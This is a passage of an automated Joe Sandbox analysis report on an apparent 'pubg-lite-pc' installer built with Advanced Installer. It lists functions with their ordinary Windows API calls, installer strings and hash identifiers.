                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: dbb9cd4b8efc4a2ce938154b12909898217aa693748a76589b9b09fb52f3b676
                                                                                                • Instruction ID: 74e634f35037920c43bc1556a66b474e3547d9e47b1dde9100b644064f5ecbb0
                                                                                                • Opcode Fuzzy Hash: dbb9cd4b8efc4a2ce938154b12909898217aa693748a76589b9b09fb52f3b676
                                                                                                • Instruction Fuzzy Hash: 0031A172908315ABC721DF28C880E9AF7E5BF9D764F444A19FA84AB290DB71DC44C7D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093A790 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(?,F4D3B90A), ref: 0093A7FA
                                                                                                • EnterCriticalSection.KERNEL32(?,F4D3B90A), ref: 0093A807
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0093A858
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3991485460-1809401727
                                                                                                • Opcode ID: c731db514ba52ee9d75ee36123cd33451f261b01fb5d1c7c449fe0f7e9995888
                                                                                                • Instruction ID: 91ff1fdd723659269ba130a6f3b87b92d38893caa2df0dddb6b5a6b61d790df1
                                                                                                • Opcode Fuzzy Hash: c731db514ba52ee9d75ee36123cd33451f261b01fb5d1c7c449fe0f7e9995888
                                                                                                • Instruction Fuzzy Hash: 2C21E536900244DFDF11CF64C840BE9BBB4FB16324F1005A9DC55AB392CB31590ACB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093A880 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(?,F4D3B90A), ref: 0093A8EA
                                                                                                • EnterCriticalSection.KERNEL32(?,F4D3B90A), ref: 0093A8F7
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0093A93E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3991485460-1809401727
                                                                                                • Opcode ID: 4e65a702eb7766e5c1a265e324d0a6d10882c88f22ec3ed96a4492b8ed94be19
                                                                                                • Instruction ID: 57b5c136f99898cceadd6ec084a8186e76c7e18158da08ba0fa0969238ef0414
                                                                                                • Opcode Fuzzy Hash: 4e65a702eb7766e5c1a265e324d0a6d10882c88f22ec3ed96a4492b8ed94be19
                                                                                                • Instruction Fuzzy Hash: 9A21A176A002459FDF11CF64DC44BA9BBB4FF15324F1005AAEC55AB292DB319906CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093A6D0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(?,F4D3B90A,?), ref: 0093A72D
                                                                                                • EnterCriticalSection.KERNEL32(?,F4D3B90A,?), ref: 0093A73A
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0093A762
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: @,w
                                                                                                • API String ID: 3991485460-1809401727
                                                                                                • Opcode ID: 43e7ba74644b0506022c37a71ba5d8ecb53c534194f42cb7ff42b47bd572bcfe
                                                                                                • Instruction ID: fcbc6e5d90738e10c944b2b45dbca7c4193c633bcc4d1b2731a3935653a1bfbf
                                                                                                • Opcode Fuzzy Hash: 43e7ba74644b0506022c37a71ba5d8ecb53c534194f42cb7ff42b47bd572bcfe
                                                                                                • Instruction Fuzzy Hash: E8219A76D042459FDF01CF54D9807E9BB74FB56324F1005A9D856A7392D7325A0ACF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097CB20 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0097CB32
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0097CB49
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0097CB6B
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0097CB78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1378638983-0
                                                                                                • Opcode ID: 4c141dc1119113b5b2d71646c7a3e530390d099a1e75a2c00a2a18d0267942f3
                                                                                                • Instruction ID: 432c962612f2d016f51e9e0ac06c273255f09fb447c896e496a3ab5550411587
                                                                                                • Opcode Fuzzy Hash: 4c141dc1119113b5b2d71646c7a3e530390d099a1e75a2c00a2a18d0267942f3
                                                                                                • Instruction Fuzzy Hash: 1FF0AF322456317BEA111728AC0DFAE7799AF16731F244300FA25E72F4DF58AC86C598
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009F03D0 Relevance: 6.0, APIs: 4, Instructions: 44threadsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000001,?,F4D3B90A,?,?,00000000,00A65BD0,000000FF,?,009F03B8,00000000,80004005,?,00B02450,?,?), ref: 009F0407
                                                                                                • GetExitCodeThread.KERNEL32(00000001,80004005,?,?,00000000,00A65BD0,000000FF,?,009F03B8,00000000), ref: 009F0421
                                                                                                • TerminateThread.KERNEL32(00000001,00000000,?,?,00000000,00A65BD0,000000FF,?,009F03B8,00000000), ref: 009F0439
                                                                                                • CloseHandle.KERNEL32(00000001,?,?,00000000,00A65BD0,000000FF,?,009F03B8,00000000,80004005,?,00B02450,?,?,009D21F9), ref: 009F0442
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
                                                                                                • String ID:
                                                                                                • API String ID: 3774109050-0
                                                                                                • Opcode ID: 026787e2160cf99c4fed4aaf8e56c0f76b80fe359de09930d8a30de558c6cb39
                                                                                                • Instruction ID: 7387cb903911214af0769054edf8603c7acc7c78f654392e5a9b7b183f2cee30
                                                                                                • Opcode Fuzzy Hash: 026787e2160cf99c4fed4aaf8e56c0f76b80fe359de09930d8a30de558c6cb39
                                                                                                • Instruction Fuzzy Hash: 96017571640609EFDB20CF94DD05B66B7FCFB04711F104A2EEA66936A1EBB5A800CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00983050 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00983062
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00983073
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00983095
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0098309F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1378638983-0
                                                                                                • Opcode ID: 7c36ed70842ca8393447711b79e2e0e74660c2cca63c817709bea62f25250675
                                                                                                • Instruction ID: cd7f8679db411434ea88a2a1d727e0c4d3b10782af5fd9f51fa98f35a75d2aa0
                                                                                                • Opcode Fuzzy Hash: 7c36ed70842ca8393447711b79e2e0e74660c2cca63c817709bea62f25250675
                                                                                                • Instruction Fuzzy Hash: 27F06D312466317BD6212B68AC0CFAE3759AF56B31F244300FA21A72F0DF985946C698
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B8370 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 380COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PathIsUNCW.SHLWAPI(?,?,00000000,?,F4D3B90A,?), ref: 009B8492
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Path
                                                                                                • String ID: \\?\$\\?\UNC\
                                                                                                • API String ID: 2875597873-3019864461
                                                                                                • Opcode ID: 387b8c07aac1a406546d0e061f1e5dad117209348e9ffcf27e197160e1dd550a
                                                                                                • Instruction ID: 9d96e230e4bbc7ceee908cf6e2eae6e672f963f3b0840b28f02b075965938cf9
                                                                                                • Opcode Fuzzy Hash: 387b8c07aac1a406546d0e061f1e5dad117209348e9ffcf27e197160e1dd550a
                                                                                                • Instruction Fuzzy Hash: D2D10171A006069FDB10DF68C988BAFB7F9FF98324F14852CE405A7295DF74A905CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00994D80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 312COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000001), ref: 00994DC9
                                                                                                • GetWindowLongW.USER32(00000001,000000F0), ref: 00995100
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID:
                                                                                                • API String ID: 847901565-3688684798
                                                                                                • Opcode ID: a4ee8a8c3b84f8dc8514bc7628e48e42df14bb1ae8bd95da136d0dcd8dc9c20a
                                                                                                • Instruction ID: b61a8782b6b79308c659c58e093357d77335862305fa470f4dbcc4b9140511c4
                                                                                                • Opcode Fuzzy Hash: a4ee8a8c3b84f8dc8514bc7628e48e42df14bb1ae8bd95da136d0dcd8dc9c20a
                                                                                                • Instruction Fuzzy Hash: E5D10571D00608DFDF25CFA8C985BEEBBB5FB58304F208259E56AA3291DB356A45CF10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EF050 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • DeleteFileW.KERNEL32(?), ref: 009EF12A
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009EF25F
                                                                                                  • Part of subcall function 009DB820: LoadStringW.USER32(000000A1,?,00000514,F4D3B90A), ref: 009DB876
                                                                                                Strings
                                                                                                • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 009EF0DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteFile$HeapLoadProcessString
                                                                                                • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                                                                • API String ID: 3373019118-3685554107
                                                                                                • Opcode ID: a76cd27eca89bec00ea7f5135e171917315e7b67940f0edc12787774893a9cee
                                                                                                • Instruction ID: 3b933d21d976155b2704d3471681f072474f4a71e4a4884a85e3694e40cbe9a2
                                                                                                • Opcode Fuzzy Hash: a76cd27eca89bec00ea7f5135e171917315e7b67940f0edc12787774893a9cee
                                                                                                • Instruction Fuzzy Hash: 7091BF31A00549DFDB01DFA9C844B9EBBB9FF55324F1482A9E915DB2A2DB31DD04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00959790 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 009598EE
                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0095990C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendTextWindow
                                                                                                • String ID: ProductName
                                                                                                • API String ID: 893732450-3586724618
                                                                                                • Opcode ID: dcca445dc081ea69935254a5177172e307b93831312c63d6d4c870d2894de62c
                                                                                                • Instruction ID: 048aa406d7205b655bca579474c6016783c059a0fcfef2f1075d5dd775ffacc5
                                                                                                • Opcode Fuzzy Hash: dcca445dc081ea69935254a5177172e307b93831312c63d6d4c870d2894de62c
                                                                                                • Instruction Fuzzy Hash: 07A1AD30904298DFDB14DFA8C894BEEBBB4AF59304F5441EDE405AB291DB705E49CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092C1C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 0092C236
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0092C2FC
                                                                                                  • Part of subcall function 0092DA10: SysFreeString.OLEAUT32(00000000), ref: 0092DAB3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFreeMessageSendStringWindow
                                                                                                • String ID: AtlAxWin140
                                                                                                • API String ID: 4045344427-3842940177
                                                                                                • Opcode ID: 92b7deaf46792ce163e6c2957bcb09acb05c7197b0d030bd38ec0a20d28051e2
                                                                                                • Instruction ID: cdac6902ec9ec27687bc8a76c91bd8abfb51827cd002413a13ce67952449e1b2
                                                                                                • Opcode Fuzzy Hash: 92b7deaf46792ce163e6c2957bcb09acb05c7197b0d030bd38ec0a20d28051e2
                                                                                                • Instruction Fuzzy Hash: B68125B4600205EFDB14CF68C888B5ABBB9FF89714F248998F9159B395CB72ED05CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0099B120 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetShortPathNameW.KERNEL32(?,?,00000105), ref: 0099B23A
                                                                                                • FindClose.KERNEL32(00000000,?), ref: 0099B35B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseFindNamePathShort
                                                                                                • String ID: \\?\
                                                                                                • API String ID: 3794870534-4282027825
                                                                                                • Opcode ID: 1fb454d8e0252fc016e72c4f6d72ae8164757668c2569b181034a9061a241289
                                                                                                • Instruction ID: b5c304ba61f6829791e3cd903bd5c4914a598d310bdda207b1f74de60b6e4d93
                                                                                                • Opcode Fuzzy Hash: 1fb454d8e0252fc016e72c4f6d72ae8164757668c2569b181034a9061a241289
                                                                                                • Instruction Fuzzy Hash: 0151D7709003149BDB24DF68ED89BAEB7F8FF54704F00069DE41997281EB75AA84CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E5F90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A86F0F,000000FF), ref: 009E6113
                                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A86F0F,000000FF), ref: 009E61A1
                                                                                                Strings
                                                                                                • << Advanced Installer (x86) Log >>, xrefs: 009E607F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCriticalDeleteHandleHeapProcessSection
                                                                                                • String ID: << Advanced Installer (x86) Log >>
                                                                                                • API String ID: 1977327082-396061572
                                                                                                • Opcode ID: 788498c56a3e1f6325c8809478aaf9d2e890efdc86e5f55af68f50b4582f118f
                                                                                                • Instruction ID: 9b5d70e56236260c386f6844046e2e12c781b6e8e8461dc016b3f56511c64a62
                                                                                                • Opcode Fuzzy Hash: 788498c56a3e1f6325c8809478aaf9d2e890efdc86e5f55af68f50b4582f118f
                                                                                                • Instruction Fuzzy Hash: 0561D070905685EFDB01CF69C948B5EBBF8EF96714F14829DD4009B392DB769A04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D976D40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 42%
